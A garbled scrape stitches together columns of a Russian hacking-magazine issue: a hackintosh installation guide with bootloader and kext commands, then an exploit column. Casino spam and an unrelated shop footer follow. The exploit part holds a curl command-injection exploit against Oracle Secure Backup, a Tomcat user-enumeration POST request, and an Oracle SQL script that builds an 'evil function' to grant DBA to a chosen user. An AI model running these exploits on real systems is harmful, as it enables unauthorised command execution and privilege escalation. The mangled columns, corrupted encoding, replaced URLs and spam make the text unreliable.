него систему на хакинтош не удастся, потому мы. Сборки чаще всего имеют устаревшую хорошо работающий способ: загрузиться с
что он также рассчитан на оригинальный версию. Впрочем, если постараться (о чем Ubuntu LiveCD, но не запускать инсталляцию
компьютер. В отличие от Microsoft Windows, рассказано ниже), можно подправить систему Линукса, а набрать в терминале команду
Apple MacOSX не требует ввода серийного таким образом, что ее реально будет апдей- sudo gparted, пароль вводить не нужно.
номера и активации, подразумевается, что тить официальными пакетами от Apple. Плюс Программа gparted поможет совершенно
подлинность компьютера заложена в нем же сборки очевиден: установить систему корректно, без потерь данных, изменить раз-
самом. В компьютерах Apple модель и серий- получится за минут, даже не имея ника- меры разделов и их расположение, создать
ный номер, а также свойства установленных кого опыта в хакинтошестроении. Установка новый раздел и отформатировать его. Итак,
устройств (аудио, видео и других) заложены Ритейла потребует немалых усилий и знаний. хороший вариант разбивки на разделы:
в EFI (goalma.org Вкратце путь таков: скачать из Сети образ 1. WindowsHD, первичный, активный раздел,
Firmware_Interface), в отличие от БИОСа загрузочного диска или флеш-накопителя, NTFS.
большинства наших компьютеров. Некоторые содержащего минимальную ОС с минималь- 2. SnowHD, первичный, пока FAT
файлы в системе зашифрованы, и ключ шиф- ным набором драйверов, загрузиться с него в 3. Расширенный раздел, где можно органи-
рования заложен в специальной микросхеме. режим командной строки, вставить в привод зовать логические разделы, если необходи-
Отсюда легко сделать вывод: для установки DVD инсталляционный диск Ритейл, смонти- мо.
системы MacOSX на неоригинальный ком- ровать его и запустить с него инсталляцию. Теперь вставляем нашу загрузочную систему
пьютер, эту защиту следует обходить еще на Широкое хождение имеет сборка 10А от либо сразу сборку и грузимся с нее. На экра-
старте установки системы, т.е. старт должен dan, которая представляет собой тот же не появляется сообщение про Darwin boot и
быть с другого источника. дистрибутив Ритейл, но с нужным загрузчи- приглашение нажать <F8>. Это стоит сделать

XÀÊÅÐ 01 // 10


для диагностики. В появившейся командной Library/Caches/goalma.org
строке набираем -v, что означает «Verbose caches/Startup/goalma.org"
boot» — до загрузки графической оболочки EXTRA_MKEXT="/Volumes/SnowHD/
мы будем видеть на экране пошаговый про- Extra/goalma.org"
цесс загрузки системы. Хорошо, поскольку
в случае неудачи ты будешь знать, на чем kextcache -v 1 -t -m "$EXTRA_
все дело остановилось. К примеру, одна из MKEXT" "$KEXT_ADD"
известнейших ошибок «till waiting for root kextcache -v 1 -t -m "$SYS_MKEXT"
device» означает, что в загрузочной систе- "$KEXT_SYSTEM"
ме отсутствует драйвер контроллера DVD-
накопителя. Один из вариантов — присоеди- Правда, в этом варианте предполагается, что
нить DVD-накопитель через USB-интерфейс, ты имеешь установленную систему MacOSX
таким способом устанавливали Тигра на на другом разделе, с которой можешь загру- А ВОТ И СПИСОК НЕЭППЛОВСКИX
всевозможные конфигурации. Либо искать зиться, и выполнить этот скрипт. Следующий УСТРОЙСТВ
другую загрузочную систему :(. вариант тоже требует наличия MacOSX, но
После пробега белых букв по черному экрану уже необязательно на том же компьютере. таки, очень емкая, но для указанного выше
он, наконец, очистился, побелел, посинел, Суть в том, что, так или иначе, загрузчик, десктопа оптимальным выбором является
и перед нами приглашение на установку установленный по умолчанию, необходи- MacPro3,1. С новым загрузчиком мы снова
MacOSX, с его лицензионным соглашением. мо менять, а вот с новейшим загрузчиком можем попытаться загрузиться в систему.
Не торопись! Сверху есть меню с утилитами, Chameleon-2 RC3 паники ядра уже нет, В некоторых конфигурациях это удается, в
там следует выбрать Disk Utility, и с помощью система сама создает мкекст. Загрузчик других будет новая «кернел-паника», на этот
него произвести форматирование выбран- создан по лицензии OpenSource, потому раз с указанием на goalma.org,
ного раздела в формат Mac OS Extended доступен в интернете. Надо заметить, есть т.е. драйвер ATA-контроллера. Проблема уже
(journaled). После завершения Disk Utility мы его хорошие модификации, к примеру, PC-EFI изучена, лечится подменой родного кекста
возвращаемся в инсталлятор, указываем, — by Netkas. В архиве содержится патченным, взятым из интернета. Еще, если
куда ставить систему, выбираем опции уста- много файлов, в данный момент интересны у тебя клавиатура PS2, к ней и драйвер пона-
новки — и в добрый путь! Заметим, что сбор- три из них: добится новый, например, goalma.org:
ки содержат очень много опций, в том числе boot0 — должен быть записан в нулевой
модифицированные ядра, БИОСы, драйвера сектор диска. Это — главная загрузочная mkdir /Volumes/SnowHD/Off
для всевозможных встроенных устройств, запись. sudo mv -v /Volumes/SnowHD/System/
«очень полезные» или даже «необходимые» boot1h — должен быть записан в нулевой Library/Extensions/IOATAFamily.
драйвера, а также набор утилит. Все это сектор раздела. kext /Volumes/SnowHD/Off
задумано не зря и не во вред пользователю, boot — должен быть расположен в корне- sudo cp -r -v /tmp/IOATAFamily.
однако, если ты не уверен, что тот или иной вой директории раздела с системой. kext /Volumes/SnowHD/System/
драйвер подойдет, лучше их не выбирать, Сделать это можно в любой операцион- Library/Extensions
наверняка в интернете найдешь более ной системе, к примеру, так это делается в sudo cp -r -v /tmp/
современный вариант. А вот утилиты взять MacOSX: goalma.org /Volumes/
можно, их наличие системе не мешает. В упо- SnowHD/System/Library/Extensions
мянутой выше сборке от dan есть еще sudo fdisk -f /tmp/boot0 -u -y / sudo cp -r -v /tmp/goalma.org
загадочный шаг по изготовлению и установке dev/rdisk0 /Volumes/SnowHD/System/Library/
файла DSDT (Differential System Description dd if=/tmp/boot1h of=/dev/rdisk0s2 Extensions
Table). Шаг обязательно стоит выполнить, sudo cp /tmp/boot /Volumes/SnowHD/
если ты не готов сделать его по-другому. В дальнейшем можно будет вернуться к род-
Ниже мы обсудим, что это и зачем. Словом, Один из вариантов, как можно сделать: ному кексту, исправив DSDT. Подменить одни
система установилась успешно, на что ей 1. Записать файлы на флешку. файлы другими проще всего из Windows,
потребовалось 10 минут, и попросила переза- 2. Загрузиться с инсталляционного диска, как только там нужно установить программу
грузки И здесь нас ждет «кернел паника», мы это уже проделывали, выбрать из меню MacDrive, позволяющую писать в раздел,
скорее всего, не последняя. Выглядит, как «терминал». отформатированный в HFS+. Доступна
таблица цифр и некоторые буквенные иден- 3. Смонтировать флешку командой дневная рабочая версия, для этих целей
тификаторы. Иногда из этого можно понять /sbin/mount -o nosuid -w -m / вполне достаточно.
причину краха. dev/disk1s1 /tmp Загружаемся в новую систему с ключами
В данном случае система не сформиро- 4. Установить загрузчик указанными выше загрузки -v -f arch=i Пояснения:
вала правильный mkext (multiple kernel командами. -v — мы должны видеть в текстовом виде,
extensions, в первом приближении это архив 5. Для загрузчика Chameleon-2 также необ- что происходит.
драйверов). Продвинутые хакеры изготавли- ходима папка /Extra в корне раздела, где -f — обновить кеш драйверов.
вают его сами, подставляют в систему, после находятся файлы goalma.org arch=i — для начала выбираем режим
чего она грузится дальше. На вкладке приве- и goalma.org Первый содержит флаги 32 бита, переход на 64 бита сделаем, когда
ден текст скрипта, который создает mkext. загрузки: Timeout в 15 секунд дает тебе воз- будем готовы к этому шагу.
можность сообразить, не хочешь ли ты загру- Наконец-то! Экран приветствия, настройки
#!/bin/bash зить другую систему или с другими флагами; нового пользователя, регистрация (не надо
system-id должен быть уникален, для этого сообщать в Эппл свои данные, так что отклю-
KEXT_SYSTEM="/Volumes/SnowHD/ существует UUIDGenerator. чи интернет). Ты в системе.
System/Library/Extensions" В файле goalma.org самый интересный
KEXT_ADD="/Volumes/SnowHD/Extra/ пункт — SMProductName. Как выяснилось, ÄÀËÜÍÅÉØÀß ÀÄÀÏÒÀÖÈß ÑÈÑÒÅÌÛ
AdditionalExtensions" от того, как ты назовешь свой компьютер, он Описанная выше процедура не всегда быва-
SYS_MKEXT="/Volumes/SnowHD/System/ и работать будет по-разному. Тема, опять- ет успешной, но даже в тех случаях, когда

XÀÊÅÐ 01 // 10


PC_ZONE

ОПРЕДЕЛИТЬ VENDORID/DEVICEID МОЖНО С ПОМО-


ЩЬЮ DPCIMANAGER
СВЕДЕНИЯ О СИСТЕМЕ. МЫ ВИДИМ: MAC OS X

система все же загружается, чаще всего Store (0x08, OSVR) acpi_tbls=`ioreg -lw0 cut -d\; -f 1

Теперь остается только перейти к делу! Настоящий эксплоит по неавторизированному выполнению команд пишется в три строки: # ïîäãîòîâêà êîìàíäû äëÿ èñïîëíåíèÿ shell=&quot;1%26ver&gt;osbshelltmp&quot; # îðãàíèçàöèÿ çàïðîñà ê óÿçâèìîìó ñöåíàðèþ ñ óêàçàíèåì êîìàíäû äëÿ èñïîëíåíèÿ ($shell) è íàëè÷èåì âàëèäíîé ñåññèè ($session) curl -k -s &quot;https://$TARGET/property_goalma.org?type=Chec kProperties&amp;vollist=$shell&quot; -b &quot;PHPSESSID=$session&quot; &gt; / dev/null # ïðîñìîòð âûïîëíåíèÿ ðåçóëüòàòà check=&#96;curl -ks &quot;https://$TARGET/osbshelltmp&quot; -b &quot;PHPSESSID=$session&quot; grep -i Microsoft&#96;

Финальной строкой мы просто убеждаемся, что вывод команды показал название версии СУБД и платформы. Полный сценарий для эксплуатации можно скачать здесь: goalma.org exploits/_sh.

SOLUTION Вендор такого уровня своевременно отреагировал на появившееся сообщение в лентах bugtrack и выпустил исправление. TARGETS Oracle Secure Backup Server X.

02

ПОДБОР СУЩЕСТВУЮЩИХ ПОЛЬЗОВАТЕЛЕЙ APACHE TOMCAT

BRIEF Известно, что на системе, где установлен Apache, находится (или может находиться) много пользователей. Конечно, сам Apache часто запускают с правами «nobody», но песня о другом! Используя ошибку класXÀÊÅÐ 01 // 10


КАК ВИДИШЬ, РОЛЬ ORACLE SECURE BACKUP ДОСТАТОЧНО ВЕЛИКА И ПОЗВОЛЯЕТ РЕЗЕРВИРОВАТЬ ДАННЫЕ НА НАИБОЛЕЕ КРИТИЧНЫХ ОБЪЕКТАХ

НАГЛЯДНЫЙ ПРИМЕР — ПОЛЬЗОВАТЕЛЬСКИЕ ПУТИ КАК НА ЛАДОНИ!

са «Design Error», а именно ошибку в реализации и проектировании со стороны разработчиков, существует возможность перечислить текущих пользователей системы! В принципе, такая возможность существовала и ранее во многих версиях известного WEB-сервера:

EXPLOIT Код эксплоита выполнен в двух вариациях — классический обход авторизации и SQL-injection, а во второй применяется метод Cursor Injection. Классический обход ограничений:

/~root /~andrej /~gogy /~UFO

Между прочим, одним из первых сканеров безопасности, который проводил проверки на предмет перебора пользователей по Apache, был Nessus (существует реализованный плагин на NASL), а затем и отечественный XSpider.

EXPLOIT Сейчас это можно делать, формируя специальный POST-запрос: POST /j_security_check HTTP/ Host: goalma.org j_username=tomcat&amp;amp;j_password=%

Комбинируя связки логин и пароль, можно добиться раскрытия данных учетных записей локальных пользователей, а по возврату ошибки, наоборот, убедиться, что их нет в системе.

set serveroutput on; prompt [+] ctxsys-drvxtabc-create_goalma.org exploit prompt [+] by Andrea &quot;bunker&quot; Purificato — http:// goalma.org prompt [+] 37F1 A7A1 BB94 89DB A 9F74 AF4C BFA2 prompt undefine the_user; accept the_user char prompt &#39;Target username (default TEST): &#39; default &#39;TEST&#39;; prompt prompt [-] Building evil function CREATE OR REPLACE FUNCTION OWN RETURN NUMBER AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE &#39;GRANT DBA TO &amp;the_user&#39;; COMMIT; RETURN(0); END; / prompt [-] Finishing exec goalma.org_tables(&#39;&#39;

nest...

казино с бесплатным фрибетом Игровой автомат Won Won Rich играть бесплатно ᐈ Игровой Автомат Big Panda Играть Онлайн Бесплатно Amatic™ играть онлайн бесплатно 3 лет Игровой автомат Yamato играть бесплатно рекламе казино vulkan игровые автоматы бесплатно игры онлайн казино на деньги Treasure Island игровой автомат Quickspin казино калигула гта са фото вабанк казино отзывы казино фрэнк синатра slottica казино бездепозитный бонус отзывы мопс казино большое казино монтекарло вкладка с реклама казино вулкан в хроме биткоин казино 999 вулкан россия казино гаминатор игровые автоматы бесплатно лицензионное казино как проверить подлинность CandyLicious игровой автомат Gameplay Interactive Безкоштовний ігровий автомат Just Jewels Deluxe как использовать на 888 poker ставку на казино почему закрывают онлайн казино Игровой автомат Prohibition играть бесплатно

© 2024 Toko Cleax. Seluruh hak cipta.